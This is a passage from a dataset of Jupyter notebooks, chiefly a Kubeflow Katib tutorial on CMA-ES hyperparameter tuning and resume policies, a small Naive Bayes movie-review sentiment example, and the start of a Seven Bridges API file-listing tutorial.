range(mu.size(0)):\n with torch.no_grad():\n samples = normal_samples + mu[i, ...]\n out_mu = net.mean(mu[i:i+1, ...], var)\n mc_mu = net(samples).mean(0, keepdim=True)\n print(round((out_mu / mc_mu).abs().mean().item(), 1))\n \n def loss(self, x, gamma=0.4):\n mu = self.moments(x, torch.tensor(0.3, dtype=x.dtype, device=x.device))\n return self.forward(x).sum() + gamma * mu.sum()\n\n# Net.test_linear(shallow=True)\n# Net.test_linear(shallow=False)\n# Net.test_conv2d(shallow=True)\n# Net.test_conv2d(shallow=False)",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
]
] |
e7066a2fba9337eac7472bab0bdfcddc0e188a52 | 42,544 | ipynb | Jupyter Notebook | examples/v1beta1/sdk/cmaes-and-resume-policies.ipynb | VariableDeclared/katib | d3c5388e564c4c198e2355617209b812c0367675 | [
"Apache-2.0"
] | null | null | null | examples/v1beta1/sdk/cmaes-and-resume-policies.ipynb | VariableDeclared/katib | d3c5388e564c4c198e2355617209b812c0367675 | [
"Apache-2.0"
] | null | null | null | examples/v1beta1/sdk/cmaes-and-resume-policies.ipynb | VariableDeclared/katib | d3c5388e564c4c198e2355617209b812c0367675 | [
"Apache-2.0"
] | null | null | null | 42.374502 | 4,187 | 0.526349 | [
[
[
"# HyperParameter tunning using CMA-ES\n\nIn this example you will deploy 3 Katib Experiments with Covariance Matrix Adaptation Evolution Strategy (CMA-ES) using Jupyter Notebook and Katib SDK. These Experiments have various resume policies.\n\nReference documentation:\n- https://www.kubeflow.org/docs/components/katib/experiment/#cmaes\n- https://www.kubeflow.org/docs/components/katib/resume-experiment/\n\nThe notebook shows how to create, get, check status and delete an Experiment.",
"_____no_output_____"
]
],
[
[
"# Install required package (Katib SDK).\n!pip install kubeflow-katib==0.12.0",
"Collecting kubeflow-katib==0.12.0\n Downloading kubeflow_katib-0.12.0-py3-none-any.whl (89 kB)\n\u001b[K |████████████████████████████████| 89 kB 7.5 MB/s eta 0:00:01\n\u001b[?25hRequirement already satisfied: urllib3>=1.15.1 in /opt/conda/lib/python3.8/site-packages (from kubeflow-katib==0.12.0) (1.26.5)\nRequirement already satisfied: certifi>=14.05.14 in /opt/conda/lib/python3.8/site-packages (from kubeflow-katib==0.12.0) (2021.5.30)\nRequirement already satisfied: setuptools>=21.0.0 in /opt/conda/lib/python3.8/site-packages (from kubeflow-katib==0.12.0) (49.6.0.post20210108)\nRequirement already satisfied: six>=1.10 in /opt/conda/lib/python3.8/site-packages (from kubeflow-katib==0.12.0) (1.15.0)\nRequirement already satisfied: kubernetes>=12.0.0 in /opt/conda/lib/python3.8/site-packages (from kubeflow-katib==0.12.0) (12.0.1)\nRequirement already satisfied: requests in /opt/conda/lib/python3.8/site-packages (from kubernetes>=12.0.0->kubeflow-katib==0.12.0) (2.25.1)\nRequirement already satisfied: requests-oauthlib in /opt/conda/lib/python3.8/site-packages (from kubernetes>=12.0.0->kubeflow-katib==0.12.0) (1.3.0)\nRequirement already satisfied: google-auth>=1.0.1 in /opt/conda/lib/python3.8/site-packages (from kubernetes>=12.0.0->kubeflow-katib==0.12.0) (1.31.0)\nRequirement already satisfied: python-dateutil>=2.5.3 in /opt/conda/lib/python3.8/site-packages (from kubernetes>=12.0.0->kubeflow-katib==0.12.0) (2.8.1)\nRequirement already satisfied: pyyaml>=3.12 in /opt/conda/lib/python3.8/site-packages (from kubernetes>=12.0.0->kubeflow-katib==0.12.0) (5.4.1)\nRequirement already satisfied: websocket-client!=0.40.0,!=0.41.*,!=0.42.*,>=0.32.0 in /opt/conda/lib/python3.8/site-packages (from kubernetes>=12.0.0->kubeflow-katib==0.12.0) (1.0.1)\nRequirement already satisfied: rsa<5,>=3.1.4 in /opt/conda/lib/python3.8/site-packages (from google-auth>=1.0.1->kubernetes>=12.0.0->kubeflow-katib==0.12.0) (4.7.2)\nRequirement already satisfied: pyasn1-modules>=0.2.1 in /opt/conda/lib/python3.8/site-packages (from google-auth>=1.0.1->kubernetes>=12.0.0->kubeflow-katib==0.12.0) (0.2.8)\nRequirement already satisfied: cachetools<5.0,>=2.0.0 in /opt/conda/lib/python3.8/site-packages (from google-auth>=1.0.1->kubernetes>=12.0.0->kubeflow-katib==0.12.0) (4.2.2)\nRequirement already satisfied: pyasn1<0.5.0,>=0.4.6 in /opt/conda/lib/python3.8/site-packages (from pyasn1-modules>=0.2.1->google-auth>=1.0.1->kubernetes>=12.0.0->kubeflow-katib==0.12.0) (0.4.8)\nRequirement already satisfied: idna<3,>=2.5 in /opt/conda/lib/python3.8/site-packages (from requests->kubernetes>=12.0.0->kubeflow-katib==0.12.0) (2.10)\nRequirement already satisfied: chardet<5,>=3.0.2 in /opt/conda/lib/python3.8/site-packages (from requests->kubernetes>=12.0.0->kubeflow-katib==0.12.0) (4.0.0)\nRequirement already satisfied: oauthlib>=3.0.0 in /opt/conda/lib/python3.8/site-packages (from requests-oauthlib->kubernetes>=12.0.0->kubeflow-katib==0.12.0) (3.1.1)\nInstalling collected packages: kubeflow-katib\nSuccessfully installed kubeflow-katib-0.12.0\n"
]
],
[
[
"## Import required packages",
"_____no_output_____"
]
],
[
[
"import copy\n\nfrom kubeflow.katib import KatibClient\nfrom kubernetes.client import V1ObjectMeta\nfrom kubeflow.katib import V1beta1Experiment\nfrom kubeflow.katib import V1beta1AlgorithmSpec\nfrom kubeflow.katib import V1beta1ObjectiveSpec\nfrom kubeflow.katib import V1beta1FeasibleSpace\nfrom kubeflow.katib import V1beta1ExperimentSpec\nfrom kubeflow.katib import V1beta1ObjectiveSpec\nfrom kubeflow.katib import V1beta1ParameterSpec\nfrom kubeflow.katib import V1beta1TrialTemplate\nfrom kubeflow.katib import V1beta1TrialParameterSpec",
"_____no_output_____"
]
],
[
[
"## Define your Experiment\n\nYou have to create your Experiment object before deploying it. This Experiment is similar to [this](https://github.com/kubeflow/katib/blob/master/examples/v1beta1/hp-tuning/cmaes.yaml) example.",
"_____no_output_____"
]
],
[
[
"# Experiment name and namespace.\nnamespace = \"kubeflow-user-example-com\"\nexperiment_name = \"cmaes-example\"\n\nmetadata = V1ObjectMeta(\n name=experiment_name,\n namespace=namespace\n)\n\n# Algorithm specification.\nalgorithm_spec=V1beta1AlgorithmSpec(\n algorithm_name=\"cmaes\"\n)\n\n# Objective specification.\nobjective_spec=V1beta1ObjectiveSpec(\n type=\"maximize\",\n goal= 0.99,\n objective_metric_name=\"Validation-accuracy\",\n additional_metric_names=[\"Train-accuracy\"]\n)\n\n# Experiment search space. In this example we tune learning rate, number of layer and optimizer.\nparameters=[\n V1beta1ParameterSpec(\n name=\"lr\",\n parameter_type=\"double\",\n feasible_space=V1beta1FeasibleSpace(\n min=\"0.01\",\n max=\"0.06\"\n ),\n ),\n V1beta1ParameterSpec(\n name=\"num-layers\",\n parameter_type=\"int\",\n feasible_space=V1beta1FeasibleSpace(\n min=\"2\",\n max=\"5\"\n ),\n ),\n V1beta1ParameterSpec(\n name=\"optimizer\",\n parameter_type=\"categorical\",\n feasible_space=V1beta1FeasibleSpace(\n list=[\"sgd\", \"adam\", \"ftrl\"]\n ),\n ),\n]\n\n\n\n# JSON template specification for the Trial's Worker Kubernetes Job.\ntrial_spec={\n \"apiVersion\": \"batch/v1\",\n \"kind\": \"Job\",\n \"spec\": {\n \"template\": {\n \"metadata\": {\n \"annotations\": {\n \"sidecar.istio.io/inject\": \"false\"\n }\n },\n \"spec\": {\n \"containers\": [\n {\n \"name\": \"training-container\",\n \"image\": \"docker.io/kubeflowkatib/mxnet-mnist:v0.12.0\",\n \"command\": [\n \"python3\",\n \"/opt/mxnet-mnist/mnist.py\",\n \"--batch-size=64\",\n \"--lr=${trialParameters.learningRate}\",\n \"--num-layers=${trialParameters.numberLayers}\",\n \"--optimizer=${trialParameters.optimizer}\"\n ]\n }\n ],\n \"restartPolicy\": \"Never\"\n }\n }\n }\n}\n\n# Configure parameters for the Trial template.\ntrial_template=V1beta1TrialTemplate(\n primary_container_name=\"training-container\",\n trial_parameters=[\n V1beta1TrialParameterSpec(\n name=\"learningRate\",\n description=\"Learning rate for the training model\",\n reference=\"lr\"\n ),\n V1beta1TrialParameterSpec(\n name=\"numberLayers\",\n description=\"Number of training model layers\",\n reference=\"num-layers\"\n ),\n V1beta1TrialParameterSpec(\n name=\"optimizer\",\n description=\"Training model optimizer (sdg, adam or ftrl)\",\n reference=\"optimizer\"\n ),\n ],\n trial_spec=trial_spec\n)\n\n\n# Experiment object.\nexperiment = V1beta1Experiment(\n api_version=\"kubeflow.org/v1beta1\",\n kind=\"Experiment\",\n metadata=metadata,\n spec=V1beta1ExperimentSpec(\n max_trial_count=7,\n parallel_trial_count=3,\n max_failed_trial_count=3,\n algorithm=algorithm_spec,\n objective=objective_spec,\n parameters=parameters,\n trial_template=trial_template,\n )\n)",
"_____no_output_____"
]
],
[
[
"## Define Experiments with resume policy\n\nWe will define another 2 Experiments with ResumePolicy = Never and ResumePolicy = FromVolume.\n\nExperiment with _Never_ resume policy can't be resumed, the Suggestion resources will be deleted.\n\nExperiment with _FromVolume_ resume policy can be resumed, volume is attached to the Suggestion. Suggestion's PVC be created for the Suggestion.",
"_____no_output_____"
]
],
[
[
"experiment_never_resume_name = \"never-resume-cmaes\"\nexperiment_from_volume_resume_name = \"from-volume-resume-cmaes\"\n\n# Create new Experiments from the previous Experiment info.\n# Define Experiment with never resume.\nexperiment_never_resume = copy.deepcopy(experiment)\nexperiment_never_resume.metadata.name = experiment_never_resume_name\nexperiment_never_resume.spec.resume_policy = \"Never\"\nexperiment_never_resume.spec.max_trial_count = 4\n\n# Define Experiment with from volume resume.\nexperiment_from_volume_resume = copy.deepcopy(experiment)\nexperiment_from_volume_resume.metadata.name = experiment_from_volume_resume_name\nexperiment_from_volume_resume.spec.resume_policy = \"FromVolume\"\nexperiment_from_volume_resume.spec.max_trial_count = 4",
"_____no_output_____"
]
],
[
[
"You can print the Experiment's info to verify it before submission.",
"_____no_output_____"
]
],
[
[
"print(experiment.metadata.name)\nprint(experiment.spec.algorithm.algorithm_name)\nprint(\"-----------------\")\nprint(experiment_never_resume.metadata.name)\nprint(experiment_never_resume.spec.resume_policy)\nprint(\"-----------------\")\nprint(experiment_from_volume_resume.metadata.name)\nprint(experiment_from_volume_resume.spec.resume_policy)\n",
"cmaes-example\ncmaes\n-----------------\nnever-resume-cmaes\nNever\n-----------------\nfrom-volume-resume-cmaes\nFromVolume\n"
]
],
[
[
"## Create your Experiment\n\nYou have to create Katib client to use the SDK.",
"_____no_output_____"
]
],
[
[
"# Create client.\nkclient = KatibClient()\n\n# Create your Experiment.\nkclient.create_experiment(experiment,namespace=namespace)",
"_____no_output_____"
]
],
[
[
"Create other Experiments.",
"_____no_output_____"
]
],
[
[
"# Create Experiment with never resume.\nkclient.create_experiment(experiment_never_resume,namespace=namespace)\n# Create Experiment with from volume resume.\nkclient.create_experiment(experiment_from_volume_resume,namespace=namespace)",
"_____no_output_____"
]
],
[
[
"## Get your Experiment\n\nYou can get your Experiment by name and receive required data.",
"_____no_output_____"
]
],
[
[
"exp = kclient.get_experiment(name=experiment_name, namespace=namespace)\nprint(exp)\nprint(\"-----------------\\n\")\n\n# Get the max trial count and latest status.\nprint(exp[\"spec\"][\"maxTrialCount\"])\nprint(exp[\"status\"][\"conditions\"][-1])",
"{'apiVersion': 'kubeflow.org/v1beta1', 'kind': 'Experiment', 'metadata': {'creationTimestamp': '2021-10-05T23:40:19Z', 'finalizers': ['update-prometheus-metrics'], 'generation': 1, 'managedFields': [{'apiVersion': 'kubeflow.org/v1beta1', 'fieldsType': 'FieldsV1', 'fieldsV1': {'f:spec': {'.': {}, 'f:algorithm': {'.': {}, 'f:algorithmName': {}}, 'f:maxFailedTrialCount': {}, 'f:maxTrialCount': {}, 'f:objective': {'.': {}, 'f:additionalMetricNames': {}, 'f:goal': {}, 'f:objectiveMetricName': {}, 'f:type': {}}, 'f:parallelTrialCount': {}, 'f:parameters': {}, 'f:trialTemplate': {'.': {}, 'f:primaryContainerName': {}, 'f:trialParameters': {}, 'f:trialSpec': {'.': {}, 'f:apiVersion': {}, 'f:kind': {}, 'f:spec': {'.': {}, 'f:template': {'.': {}, 'f:metadata': {'.': {}, 'f:annotations': {'.': {}, 'f:sidecar.istio.io/inject': {}}}, 'f:spec': {'.': {}, 'f:containers': {}, 'f:restartPolicy': {}}}}}}}}, 'manager': 'OpenAPI-Generator', 'operation': 'Update', 'time': '2021-10-05T23:40:19Z'}, {'apiVersion': 'kubeflow.org/v1beta1', 'fieldsType': 'FieldsV1', 'fieldsV1': {'f:metadata': {'f:finalizers': {'.': {}, 'v:\"update-prometheus-metrics\"': {}}}, 'f:status': {'.': {}, 'f:conditions': {}, 'f:currentOptimalTrial': {'.': {}, 'f:bestTrialName': {}, 'f:observation': {'.': {}, 'f:metrics': {}}, 'f:parameterAssignments': {}}, 'f:runningTrialList': {}, 'f:startTime': {}, 'f:trials': {}, 'f:trialsRunning': {}}}, 'manager': 'katib-controller', 'operation': 'Update', 'time': '2021-10-05T23:40:54Z'}], 'name': 'cmaes-example', 'namespace': 'kubeflow-user-example-com', 'resourceVersion': '393932086', 'uid': 'ccf6bb73-6768-4e6e-9a23-742d0953ecf1'}, 'spec': {'algorithm': {'algorithmName': 'cmaes'}, 'maxFailedTrialCount': 3, 'maxTrialCount': 7, 'metricsCollectorSpec': {'collector': {'kind': 'StdOut'}}, 'objective': {'additionalMetricNames': ['Train-accuracy'], 'goal': 0.99, 'metricStrategies': [{'name': 'Validation-accuracy', 'value': 'max'}, {'name': 'Train-accuracy', 'value': 'max'}], 'objectiveMetricName': 'Validation-accuracy', 'type': 'maximize'}, 'parallelTrialCount': 3, 'parameters': [{'feasibleSpace': {'max': '0.06', 'min': '0.01'}, 'name': 'lr', 'parameterType': 'double'}, {'feasibleSpace': {'max': '5', 'min': '2'}, 'name': 'num-layers', 'parameterType': 'int'}, {'feasibleSpace': {'list': ['sgd', 'adam', 'ftrl']}, 'name': 'optimizer', 'parameterType': 'categorical'}], 'resumePolicy': 'LongRunning', 'trialTemplate': {'failureCondition': 'status.conditions.#(type==\"Failed\")#|#(status==\"True\")#', 'primaryContainerName': 'training-container', 'successCondition': 'status.conditions.#(type==\"Complete\")#|#(status==\"True\")#', 'trialParameters': [{'description': 'Learning rate for the training model', 'name': 'learningRate', 'reference': 'lr'}, {'description': 'Number of training model layers', 'name': 'numberLayers', 'reference': 'num-layers'}, {'description': 'Training model optimizer (sdg, adam or ftrl)', 'name': 'optimizer', 'reference': 'optimizer'}], 'trialSpec': {'apiVersion': 'batch/v1', 'kind': 'Job', 'spec': {'template': {'metadata': {'annotations': {'sidecar.istio.io/inject': 'false'}}, 'spec': {'containers': [{'command': ['python3', '/opt/mxnet-mnist/mnist.py', '--batch-size=64', '--lr=${trialParameters.learningRate}', '--num-layers=${trialParameters.numberLayers}', '--optimizer=${trialParameters.optimizer}'], 'image': 'docker.io/kubeflowkatib/mxnet-mnist:v0.12.0', 'name': 'training-container'}], 'restartPolicy': 'Never'}}}}}}, 'status': {'conditions': [{'lastTransitionTime': '2021-10-05T23:40:19Z', 'lastUpdateTime': '2021-10-05T23:40:19Z', 'message': 'Experiment is created', 'reason': 'ExperimentCreated', 'status': 'True', 'type': 'Created'}, {'lastTransitionTime': '2021-10-05T23:40:54Z', 'lastUpdateTime': '2021-10-05T23:40:54Z', 'message': 'Experiment is running', 'reason': 'ExperimentRunning', 'status': 'True', 'type': 'Running'}], 'currentOptimalTrial': {'bestTrialName': '', 'observation': {'metrics': None}, 'parameterAssignments': None}, 'runningTrialList': ['cmaes-example-xn6txwtw', 'cmaes-example-8crn89vg', 'cmaes-example-4q8hmt9r'], 'startTime': '2021-10-05T23:40:19Z', 'trials': 3, 'trialsRunning': 3}}\n-----------------\n\n7\n{'lastTransitionTime': '2021-10-05T23:40:54Z', 'lastUpdateTime': '2021-10-05T23:40:54Z', 'message': 'Experiment is running', 'reason': 'ExperimentRunning', 'status': 'True', 'type': 'Running'}\n"
]
],
[
[
"## Get all Experiments\n\nYou can get list of the current Experiments.",
"_____no_output_____"
]
],
[
[
"# Get names from the running Experiments.\nexp_list = kclient.get_experiment(namespace=namespace)\n\nfor exp in exp_list[\"items\"]:\n print(exp[\"metadata\"][\"name\"])",
"cmaes-example\nfrom-volume-resume-cmaes\nnever-resume-cmaes\n"
]
],
[
[
"## Get the current Experiment status\n\nYou can check the current Experiment status.",
"_____no_output_____"
]
],
[
[
"kclient.get_experiment_status(name=experiment_name, namespace=namespace)",
"_____no_output_____"
]
],
[
[
"You can check if your Experiment is succeeded.",
"_____no_output_____"
]
],
[
[
"kclient.is_experiment_succeeded(name=experiment_name, namespace=namespace)",
"_____no_output_____"
]
],
[
[
"## List of the current Trials\n\nYou can get list of the current trials with the latest status.",
"_____no_output_____"
]
],
[
[
"# Trial list.\nkclient.list_trials(name=experiment_name, namespace=namespace)",
"_____no_output_____"
]
],
[
[
"## Get the optimal HyperParameters\n\nYou can get the current optimal Trial from your Experiment. For the each metric you can see the max, min and latest value.",
"_____no_output_____"
]
],
[
[
"# Optimal HPs.\nkclient.get_optimal_hyperparameters(name=experiment_name, namespace=namespace)",
"_____no_output_____"
]
],
[
[
"## Status for the Suggestion objects\n\nYou can check the Suggestion object status for more information about resume status.\n\nFor Experiment with FromVolume you should be able to check created PVC.",
"_____no_output_____"
]
],
[
[
"# Get the current Suggestion status for the never resume Experiment.\nsuggestion = kclient.get_suggestion(name=experiment_never_resume_name, namespace=namespace)\n\nprint(suggestion[\"status\"][\"conditions\"][-1][\"message\"])\nprint(\"-----------------\")\n\n# Get the current Suggestion status for the from volume Experiment.\nsuggestion = kclient.get_suggestion(name=experiment_from_volume_resume_name, namespace=namespace)\n\nprint(suggestion[\"status\"][\"conditions\"][-1][\"message\"])",
"Suggestion is succeeded, can't be restarted\n-----------------\nSuggestion is succeeded, suggestion volume is not deleted, can be restarted\n"
]
],
[
[
"## Delete your Experiments\n\nYou can delete your Experiments.",
"_____no_output_____"
]
],
[
[
"kclient.delete_experiment(name=experiment_name, namespace=namespace)\nkclient.delete_experiment(name=experiment_never_resume_name, namespace=namespace)\nkclient.delete_experiment(name=experiment_from_volume_resume_name, namespace=namespace)",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
]
] |
e7066ab803d2263969f2857e8232399b558a8704 | 12,058 | ipynb | Jupyter Notebook | MachineLearning/projects/MovieReviewPrediction/Untitled2.ipynb | pulkit10251/cbData-Science-Master | fc3780b41c463530760ca7b7872158c5f8e38332 | [
"MIT"
] | null | null | null | MachineLearning/projects/MovieReviewPrediction/Untitled2.ipynb | pulkit10251/cbData-Science-Master | fc3780b41c463530760ca7b7872158c5f8e38332 | [
"MIT"
] | null | null | null | MachineLearning/projects/MovieReviewPrediction/Untitled2.ipynb | pulkit10251/cbData-Science-Master | fc3780b41c463530760ca7b7872158c5f8e38332 | [
"MIT"
] | null | null | null | 26.618102 | 209 | 0.407779 | [
[
[
"\nx = [\"This was awesome an awesome movie\",\n \"Great movie! I liked it a lot\",\n \"Happy Ending! awesome acting by the hero\",\n \"loved it! truly great\",\n \"bad not upto the mark\",\n \"could have been better\",\n \"Surely a Disappointing movie\",\n \"Totally a disgrace, fucked up movie\",\n \"the movie was not good\"]\n\ny = [1,1,1,1,0,0,0,0,0] # 1 - Positive, 0 - Negative Class",
"_____no_output_____"
],
[
"x_test = [\"I was happy & happy and I loved the acting in the movie\",\n \"The movie I saw was bad\",\n \"totally fucked up movie\",\n \"the movie i saw was not bad\"]",
"_____no_output_____"
],
[
"from nltk.tokenize import RegexpTokenizer\nfrom nltk.stem import PorterStemmer\nfrom nltk.corpus import stopwords\n\n\ntokenizer=RegexpTokenizer(r'\\w+')\nps=PorterStemmer()\nen_stopwords=set(stopwords.words('English'))\n\n\n\ndef get_cleanedreview(review):\n review=review.lower()\n review=review.replace(\"<br /><br />\",\" \")\n tokens=tokenizer.tokenize(review)\n new_tokens=[token for token in tokens if token not in en_stopwords]\n if \"not\" in tokens:\n new_tokens.append(\"not\")\n stemmed_token=[ps.stem(token) for token in new_tokens]\n \n cleaned_review=' '.join(stemmed_token)\n return cleaned_review",
"_____no_output_____"
],
[
"xcleaned=[get_cleanedreview(sen) for sen in x]\nxtestcleaned=[get_cleanedreview(sen) for sen in x_test]\nprint(xcleaned)",
"['awesom awesom movi', 'great movi like lot', 'happi end awesom act hero', 'love truli great', 'bad upto mark not', 'could better', 'sure disappoint movi', 'total disgrac fuck movi', 'movi good not']\n"
],
[
"from sklearn.feature_extraction.text import CountVectorizer",
"_____no_output_____"
],
[
"cv=CountVectorizer(ngram_range=(1,2))",
"_____no_output_____"
],
[
"xtrain=cv.fit_transform(xcleaned,y).toarray()",
"_____no_output_____"
],
[
"xpred=cv.transform(xtestcleaned).toarray()",
"_____no_output_____"
],
[
"print(xtrain)",
"[[0 0 2 0 1 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0\n 0 0 0 0 0 0 0 0 0]\n [0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 1 0 0 0 1 1 1 0 0 0 0 1 0 1\n 0 0 0 0 0 0 0 0 0]\n [1 1 1 1 0 0 0 0 0 0 0 0 0 0 0 1 1 0 0 0 0 0 0 1 1 1 0 0 0 0 0 0 0 0 0 0\n 0 0 0 0 0 0 0 0 0]\n [0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 1 1 0 0 0 0 0\n 0 0 0 0 0 1 1 0 0]\n [0 0 0 0 0 0 1 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 1 0 0 0\n 1 0 0 0 0 0 0 1 1]\n [0 0 0 0 0 0 0 0 1 1 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0\n 0 0 0 0 0 0 0 0 0]\n [0 0 0 0 0 0 0 0 0 0 0 1 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0\n 0 1 1 0 0 0 0 0 0]\n [0 0 0 0 0 0 0 0 0 0 0 0 0 1 1 0 0 1 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0\n 0 0 0 1 1 0 0 0 0]\n [0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 1 0 0 0 0 0 0 0 0 0 0 0 0 1 1 0\n 1 0 0 0 0 0 0 0 0]]\n"
],
[
"print(xpred)",
"[[1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 2 0 0 0 0 0 1 0 0 0 1 0 0\n 0 0 0 0 0 0 0 0 0]\n [0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0\n 0 0 0 0 0 0 0 0 0]\n [0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0\n 0 0 0 1 0 0 0 0 0]\n [0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0\n 1 0 0 0 0 0 0 0 0]]\n"
],
[
"from sklearn.naive_bayes import MultinomialNB",
"_____no_output_____"
],
[
"mnb=MultinomialNB()",
"_____no_output_____"
],
[
"mnb.fit(xtrain,y)",
"_____no_output_____"
],
[
"mnb.predict(xpred)",
"_____no_output_____"
],
[
"from sklearn.feature_extraction.text import TfidfVectorizer",
"_____no_output_____"
],
[
"tfidf=TfidfVectorizer(ngram_range=(1,2))",
"_____no_output_____"
],
[
"xtrain1=tfidf.fit_transform(xcleaned,y).toarray()",
"_____no_output_____"
],
[
"xtest1=tfidf.transform(xtestcleaned).toarray()\nprint(xtest1)",
"[[0.39730042 0. 0. 0. 0. 0.\n 0. 0. 0. 0. 0. 0.\n 0. 0. 0. 0. 0. 0.\n 0. 0. 0. 0. 0. 0.79460084\n 0. 0. 0. 0. 0. 0.39730042\n 0. 0. 0. 0.23003102 0. 0.\n 0. 0. 0. 0. 0. 0.\n 0. 0. 0. ]\n [0. 0. 0. 0. 0. 0.\n 0.86541213 0. 0. 0. 0. 0.\n 0. 0. 0. 0. 0. 0.\n 0. 0. 0. 0. 0. 0.\n 0. 0. 0. 0. 0. 0.\n 0. 0. 0. 0.50106071 0. 0.\n 0. 0. 0. 0. 0. 0.\n 0. 0. 0. ]\n [0. 0. 0. 0. 0. 0.\n 0. 0. 0. 0. 0. 0.\n 0. 0. 0. 0. 0. 0.54756731\n 0.54756731 0. 0. 0. 0. 0.\n 0. 0. 0. 0. 0. 0.\n 0. 0. 0. 0.31703331 0. 0.\n 0. 0. 0. 0.54756731 0. 0.\n 0. 0. 0. ]\n [0. 0. 0. 0. 0. 0.\n 0.69866894 0. 0. 0. 0. 0.\n 0. 0. 0. 0. 0. 0.\n 0. 0. 0. 0. 0. 0.\n 0. 0. 0. 0. 0. 0.\n 0. 0. 0. 0.4045189 0. 0.\n 0.59010691 0. 0. 0. 0. 0.\n 0. 0. 0. ]]\n"
],
[
"tfidf.vocabulary_",
"_____no_output_____"
],
[
"mnb.fit(xtrain1,y)",
"_____no_output_____"
],
[
"mnb.predict(xtest1)",
"_____no_output_____"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
e706732e5c172fbef03a295272aba4fea13701a1 | 2,420 | ipynb | Jupyter Notebook | notebooks/nl-be/rpi_switch.ipynb | RaspberryJamBe/IPythonNotebooks | f827fa4c5e85a4c629269954a704000201435e71 | [
"CC0-1.0"
] | null | null | null | notebooks/nl-be/rpi_switch.ipynb | RaspberryJamBe/IPythonNotebooks | f827fa4c5e85a4c629269954a704000201435e71 | [
"CC0-1.0"
] | null | null | null | notebooks/nl-be/rpi_switch.ipynb | RaspberryJamBe/IPythonNotebooks | f827fa4c5e85a4c629269954a704000201435e71 | [
"CC0-1.0"
] | null | null | null | 22 | 113 | 0.462397 | [
[
[
"empty"
]
]
] | [
"empty"
] | [
[
"empty"
]
] |
e70674cc4af4f2208f41d53738a9ad785805f44a | 5,541 | ipynb | Jupyter Notebook | Recipes/CGC/files_listAll.ipynb | sbg/okAPI | 4dbf9e917e2a53241fc2a58ddb51ccc9a990b348 | [
"CC-BY-4.0"
] | 23 | 2016-04-03T13:44:35.000Z | 2020-11-19T13:18:33.000Z | Recipes/CGC/files_listAll.ipynb | sbg/okAPI | 4dbf9e917e2a53241fc2a58ddb51ccc9a990b348 | [
"CC-BY-4.0"
] | 8 | 2016-07-06T21:42:35.000Z | 2022-03-05T01:06:32.000Z | Recipes/CGC/files_listAll.ipynb | sbg/okAPI | 4dbf9e917e2a53241fc2a58ddb51ccc9a990b348 | [
"CC-BY-4.0"
] | 17 | 2016-03-23T12:36:24.000Z | 2021-10-30T17:35:21.000Z | 30.955307 | 243 | 0.587259 | [
[
[
"# Which _files_ are in my project?\n### Overview\nHere we focus on listing all files within a single project. Importantly, files are only accessible **within** a project<sup>1</sup>. As with any **list**-type call, we will get minimal information about each file. \n\n### Prerequisites\n 1. You need to be a member (or owner) of _at least one_ project.\n 2. You need your _authentication token_ and the API needs to know about it. See <a href=\"Setup_API_environment.ipynb\">**Setup_API_environment.ipynb**</a> for details.\n 3. You understand how to <a href=\"projects_listAll.ipynb\" target=\"_blank\">list</a> projects you are a member of (we will just use that call directly and pick one here).\n 4. Your project needs to have at least one file inside\n \n## Imports\nWe import the _Api_ class from the official sevenbridges-python bindings below.\n\n<sup>1</sup> There is no \"list **all** *files*\" API call that parallels the \"list **all**\" calls for *projects* and *apps*",
"_____no_output_____"
]
],
[
[
"import sevenbridges as sbg",
"_____no_output_____"
]
],
[
[
"## Initialize the object\nThe _Api_ object needs to know your **auth\\_token** and the correct path. Here we assume you are using the .sbgrc file in your home directory. For other options see <a href=\"Setup_API_environment.ipynb\">Setup_API_environment.ipynb</a>",
"_____no_output_____"
]
],
[
[
"# [USER INPUT] specify platform {cgc, sbg}\nprof = 'cgc'\n\nconfig_config_file = sbg.Config(profile=prof)\napi = sbg.Api(config=config_config_file)",
